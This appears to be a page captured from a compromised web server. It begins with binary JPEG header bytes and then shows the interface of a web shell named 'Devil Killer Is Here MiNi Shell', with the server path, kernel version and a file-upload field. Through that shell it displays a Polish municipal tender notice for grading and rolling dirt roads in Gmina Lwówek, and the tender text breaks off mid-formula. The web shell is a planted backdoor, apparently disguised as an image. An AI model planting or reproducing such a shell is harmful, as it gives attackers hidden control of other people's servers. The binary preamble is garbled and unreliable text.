JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240314/0024565801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Bieżąca konserwacja dróg gminnych gruntowych z terenu Gminy Lwówek polegająca na równaniu - profilowaniu mechanicznym wraz z zagęszczaniem przez wałowanie walcem na okres dwóch lat. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LWÓWEK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258879</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ratuszowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lwówek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">614414024</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">614414024 - prosić o włączenie</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@lwowek.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.lwowek.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżąca konserwacja dróg gminnych gruntowych z terenu Gminy Lwówek polegająca na równaniu - profilowaniu mechanicznym wraz z zagęszczaniem przez wałowanie walcem na okres dwóch lat. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3d3d7b8c-e204-11ee-a01e-f641a8763d5f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00245658</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00055740/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Bieżąca konserwacja gruntowych dróg gminnych z terenu Gminy Lwówek na okres dwóch lat.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lwowek <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Informacje ogólne:<br/>1) Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy Zakupowej oraz poczty elektronicznej, e-mail: przetargi@lwowek.com.pl <br/>2) Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane zostały w: <br/>- „Regulaminie Internetowej Platformy Zakupowej platformazakupowa.pl Open Nexus Sp. z o. o.” dostępnym pod adresem https://platformazakupowa.pl/strona/1-regulamin oraz <br/>- „Instrukcji dla wykonawców” dostępnej pod adresem https://platformazakupowa.pl/strona/45-instrukcje. <br/>3) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w tym złożenie ofert oraz oświadczeń, o których mowa w art. 125 PZP, odbywa się wyłącznie za pośrednictwem Platformy Zakupowej. Zamawiający dopuszcza ...<br/><br/>Pozostała treść informacji o środkach komunikacji elektronicznej z uwagi na ograniczoną ilość znaków do pisania została przedstawiona w rozdziale XII SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) Wykonawca składa ofertę w oryginale wraz z wymaganymi dokumentami za pośrednictwem „Formularza składania oferty” Platformy Zakupowej Open Nexus, dostępnej pod adresem: https://platformazakupowa.pl/pn/lwowek w miejscu publikacji dokumentacji zamówienia publicznego. <br/>2) Rozszerzenia plików wykorzystywanych przez Wykonawców muszą być zgodne z Załącznikiem nr 2 do “Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”. Zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .docx, .xls, .xlsx, .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip, .7Z <br/>3) Oferta powinna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. <br/>4) Wykonawca może przed upływem terminu do składania ofert określonym w niniejszej SWZ wycofać ofertę za pośrednictwem „Formularza składania oferty” Platformy Zakupowej. Z uwagi na to, że złożona oferta zostaje zaszyfrowana, nie ma możliwości zmiany oferty poprzez jej edycję, a wyłącznie poprzez wycofanie oferty i złożenie nowej. Złożenie nowej oferty w miejsce wycofanej należy wykonać przed upływem terminu składania ofert. <br/>5) Zasady korzystania z Platformy Zakupowej, jak również sposób składania oferty, zmiany oferty i wycofania oferty, w tym także podpisywanie dokumentów opisane zostały w: <br/>- „Regulaminie Internetowej Platformy zakupowej platformazakupowa.pl Open Nexus Sp. z o. o.” dostępnym pod adresem https://platformazakupowa.pl/strona/1-regulamin oraz <br/>- „Instrukcji dla wykonawców” dostępnej pod adresem https://platformazakupowa.pl/strona/45-instrukcje. <br/>6) Sposób sporządzenia oraz przekazywania dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od wykonawcy. <br/>7) Wykonawca zobowiązany jest do zapoznania się z dokumentacją postępowania oraz dokumentami, o których mowa w ppkt 5-6 powyżej w celu prawidłowego przygotowania i złożenia oferty. <br/>8) Wykonawca ponosi wszelkie koszty związane z przygotowaniem i złożeniem oferty. <br/><br/>Pozostała treść informacji o wymaganiach technicznych i organizacyjnych dot. korespondencji elektronicznej z uwagi na ograniczoną ilość znaków do pisania została przedstawiona w rozdziale XII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1. Administratorem Pani/Pana danych osobowych jest Gmina Lwówek, reprezentowana przez Burmistrza Miasta i Gminy Lwówek Piotra Długosza z siedzibą w Urzędzie Miasta i Gminy w Lwówku, ul. Ratuszowa 2, 64-310 Lwówek.<br/>2. Inspektorem ochrony danych osobowych w Gminie Lwówek jest Sekretarz Gminy pan Maciej Piechowiak, <br/>nr tel. 61 44 14 024 - centrala, adres email: iod@lwowek.com.pl <br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego. <br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp. <br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; <br/>8. Posiada Pani/Pan: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników); <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>(prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9. Nie przysługuje Pani/Panu: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający nie przewiduje ograniczenia stosowania przepisów RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.02.00.2024.ZJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 416260,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia<br/>Przedmiotem zamówienia jest wykonywanie usług polegających na równaniu - profilowaniu dróg gminnych <br/>gruntowych wraz z jednoczesnym zagęszczaniem nawierzchni gruntowej przez wałowanie walcem (drogi o kategorii <br/>ruchu lokalnego), na terenie miasta i gminy Lwówek, wraz z dojazdem na miejsce wykonywania robót i powrotem <br/>do miejsca garażowania.<br/> <br/>2. Klasyfikacja rodzajowa czynności z zakresu bieżącej konserwacji<br/>Zamawiający w określeniu przedmiotu zamówienia przyjmuje, że poprzez bieżącą konserwację rozumie wykonywanie czynności niezbędnych do utrzymania obiektu budowlanego (którym są gminne drogi gruntowe, lub ich części) w odpowiednim stanie technicznym, tak aby obiekt budowlany nie ulegał pogorszeniu z powodu codziennej eksploatacji oraz działania czynników atmosferycznych.<br/>Z wyżej wymienionego powodu czynności z zakresu bieżącej konserwacji nie stanowią robót budowlanych i nie podlegają przepisom Prawa budowlanego. Prace wykonywane w ramach bieżącej konserwacji gminnych dróg gruntowych Zamawiający kwalifikuje do kategorii usług. <br/><br/>3. Zakres przedmiotu zamówienia<br/>Przewidywana przez Zamawiającego powierzchnia nieutwardzonych nawierzchni gruntowych dróg gminnych podlegających równaniu - profilowaniu mechanicznemu równiarką wraz z wałowaniem w okresie obowiązywania przyszłej umowy wynosi ogółem ca 800.000m2 (w jednym roku budżetowym), <br/>a w tym: <br/>1) gminne drogi wiejskie – ca 330.000m2 <br/>2) gminne drogi przejazdowe dla autobusów szkolnych + miasto – ca 470.000m2<br/><br/>4. Charakterystyka prac do wykonania <br/>Równanie dróg gminnych w danym roku budżetowym podzielono na dwa etapy realizacji: <br/>1) Równanie wiosenne; drogi przejazdowe na terenach obrębów wiejskich – ca 250.000m2, oraz drogi przejazdowe dla przejazdu autobusów szkolnych + miasto – ca 350.000m2, <br/>2) Równanie jesienne; drogi przejazdowe na terenach obrębów wiejskich – 80.000m2, oraz drogi przejazdowe dla przejazdu autobusów szkolnych + miasto – ca 120.000m2. <br/>3) Z powyższego wynika, że przewidywana przez Zamawiającego powierzchnia gruntowych dróg gminnych podlegających równaniu - profilowaniu mechanicznemu równiarką oraz wałowaniu walcem w okresie trwania umowy (dwóch lat) wynosi ogółem ca 1.600.000m2. <br/>Przewidywana przez Zamawiającego powierzchnia gruntowych dróg gminnych podlegających zagęszczeniu przez wałowanie walcem w okresie obowiązywania umowy wynosi 100% wszystkich dróg gruntowych podlegających równaniu - profilowaniu i równa się powierzchni – ca 800.000m2 (w jednym roku budżetowym), ogółem w okresie trwania umowy (dwóch lat) wynosi ca 1.600.000m2.<br/>4) Uwaga:<br/>podane powyżej wielkości (zakres przedmiotu zamówienia) mogą ulec zmianie (zmniejszeniu lub zwiększeniu) w wyniku zmniejszenia lub zwiększenia się bieżącego zapotrzebowania Zamawiającego na równanie - profilowanie z zagęszczaniem przez wałowanie walcem w bieżącym utrzymaniu dróg gminnych w okresie obowiązywania umowy, na co mają wpływ nieprzewidywalne warunki atmosferyczne panujące w danym okresie roku (w danej porze roku). <br/>5) Równanie mechaniczne gruntowych dróg gminnych ma polegać na profilowaniu - skorygowaniu przekroju drogi <br/>i wyrównaniu jej nierówności w celu poprawy komfortu ruchu kołowego i lepszego odwodnienia nawierzchni drogi.<br/>6) Profilowanie powinno zapewnić odpowiednie pochylenie poprzeczne drogi gruntowej umożliwiające odpływ <br/>wody z nawierzchni równanej drogi na pobocze i wynosić nie mniej niż 4%. Kierunek i rodzaj pochylenia (daszkowy lub poprzeczny) uzależnić należy od naturalnych warunków usytuowania dróg w terenie, grunt lub kruszywo zmieszane z gruntem pozyskane w czasie profilowania należy w miarę możliwości wykorzystać do wywołania odpowiedniego pochylenia nawierzchni drogi lub uzupełnienia ubytków drogi w innych miejscach. <br/>7) Równanie dróg należy wykonywać sprzętem zapewniającym należyte wykonanie zamówienia np. równiarkami<br/>samobieżnymi lub innym sprzętem równoważnym zapewniającym w wykonywaniu usług efekt należycie wykonanej pracy z dobrym efektem. <br/>8) Równanie dróg zaleca się wykonywać najlepiej po średnim deszczu, gdy grunt jest wilgotny, co ułatwia zarówno ścinanie gruntu na wzniesieniach, jak i jego zagęszczenie w zaniżeniach dróg. <br/>9) Liczba przejazdów sprzętem (w tym i walcem) może być (jest) różna i zależna od stopnia „zniszczenia” nawierzchni <br/>do uzyskania należytego profilu drogi, rodzaju podłoża i sposobu równania na różnych odcinkach dróg przeznaczonych do bieżącej konserwacji.<br/>10) Zalecenia do wykonywanych robót: w czasie równania, wykonawca winien prowadzonym sprzętem wyrównywać wyboje materiałem otrzymanym ze ścięcia wzniesień, powstałych z materiału wyniesionego z wybojów przez koła pojazdów, lub będących wynikiem nierównomiernego zagęszczenia gruntowej jezdni, uformować profil drogi przez przesunięcie otrzymanego po ścięciu nawierzchni materiału do środka drogi (osi drogi) z jednoczesnym wyrównaniem kolein, przemieścić wzruszone górne warstwy nawierzchni gruntowej drogi w celu uformowania jej profilu z jednoczesnym wałowaniem walcem przygotowanej nawierzchni.<br/>11) Zagęszczanie mechaniczne przez wałowanie należy przeprowadzać za pomocą np. walca drogowego statycznego <br/>lub wibracyjnego (w przypadku takiej potrzeby), lub innego sprzętu równoważnego – w wykonywaniu usług wałowania najważniejszy jest efekt dobrze i należycie wykonanej pracy. Zagęszczenie może obejmować kilkakrotny przejazd walcem tych samych odcinków dróg w celu uzyskania właściwego stopnia zagęszczenia nawierzchni i należytego wykonania zamówienia. <br/>12) Zamawiający zachęca potencjalnych wykonawców do orientacyjnego zapoznania się z terenem bieżącej konserwacji dróg gminnych na terenie gminy Lwówek poprzez przeprowadzenie wizji lokalnej gruntowych dróg gminnych przed złożeniem oferty, celem prawidłowego oszacowania zakresu robót do wykonania. <br/>13) Wykonywanie bieżącej konserwacji gruntowych dróg gminnych powinno spełniać wymagania polskiej normy PN-S-02205:1998 drogi samochodowe – roboty ziemne, wymagania i badania.<br/><br/>5. Zakres przedmiotu zamówienia obejmuje <br/>1) Dojazd na miejsce wykonywania usługi i powrót do miejsca garażowania (koszt dojazdów i powrotów do miejsca garażowania musi być wliczony w cenę jednostkową za wykonanie usługi), 2) Mechaniczne równanie - profilowanie dróg gruntowych oraz usuwanie warkoczy ziemnych równiarką równiarką, <br/>3) Usuwanie z drogi wystających korzeni i odpadów budowlanych, a w tym: kamieni, elementów ceramicznych np.: cegieł, dachówek, szkła w każdej postaci, elementów metalowych np.: drutów, płaskowników i innych, kamieni sztucznych, a w tym części okładzin ściennych i posadzkowych np.: płytek, a także wszelkich innych zanieczyszczeń, które nie powinny się znajdować na pasach jezdnych dróg z ich wywozem na miejsce składowania odpadów stałych (w przypadku takiej potrzeby), Zamawiający nie zapewnia miejsca składowania usuniętych z profilowania dróg odpadów. <br/><br/>6. Tryb zlecania wykonania usługi i rozliczania wykonanych prac <br/>1) Każdorazowe zlecenie wykonania równania drogi nastąpi telefonicznie i niezwłocznie zostanie potwierdzone pisemnie przez Zamawiającego (za pomocą poczty elektronicznej – powstaje dowód udzielenia zamówienia i przekazania odcinka drogi (lub dróg) Wykonawcy wykonującego usługi bieżącej konserwacji, 2) W przypadku takiej potrzeby Zamawiający i Wykonawca przed przystąpieniem do robót drogowych dokonają odwrotnej wizji lokalnej w terenie (z udziałem lokalnego przedstawiciela np. sołtysa wsi), przed udzieleniem zlecenia na wykonanie konkretnego odcinka drogi, <br/>3) Rozliczenia za wykonane roboty drogowe będą dokonywane w oparciu o cenę jednostkową za 1 m² wyrównanej – wyprofilowanej i zagęszczonej walcem drogi, <br/><br/>Z uwagi na ograniczoną ilość znaków do wpisania pozostała treść określająca przedmiot zamówienia została przedstawiona w rozdziale IV SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233141-9 - Roboty w zakresie konserwacji dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert przedstawione poniżej: <br/>1) cena ryczałtowa brutto za wykonanie 1m2 równania - profilowania drogi gruntowej wraz z wykonaniem zagęszczenia drogi gruntowej przez wałowanie 1m2 walcem - waga 60% znaczenia,<br/>2) najkrótszy czas reakcji - oznacza czas w jakim Wykonawca przystąpi do wykonywania usługi liczony od momentu zgłoszenia Zamawiającego – waga 40% znaczenia.<br/><br/>Zastosowany wzór do obliczenia punktowego <br/> con : cob x 100pkt. x 60% + nmczr : czrob x 100pkt. x 40% = wartość punktowa oferty <br/>gdzie; <br/>ad 1) ceny ryczałtowej brutto kompletnego wykonania zamówienia - waga 60% znaczenia<br/>kryterium cena będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, maksymalną ilość 60pkt. otrzyma Wykonawca oferujący najniższą cenę, pozostali Wykonawcy proporcjonalnie mniej, wg poniższego wzoru: <br/>zastosowany wzór do obliczenia punktowego, kryterium cena; wzór con : cob x 100pkt. x 60% 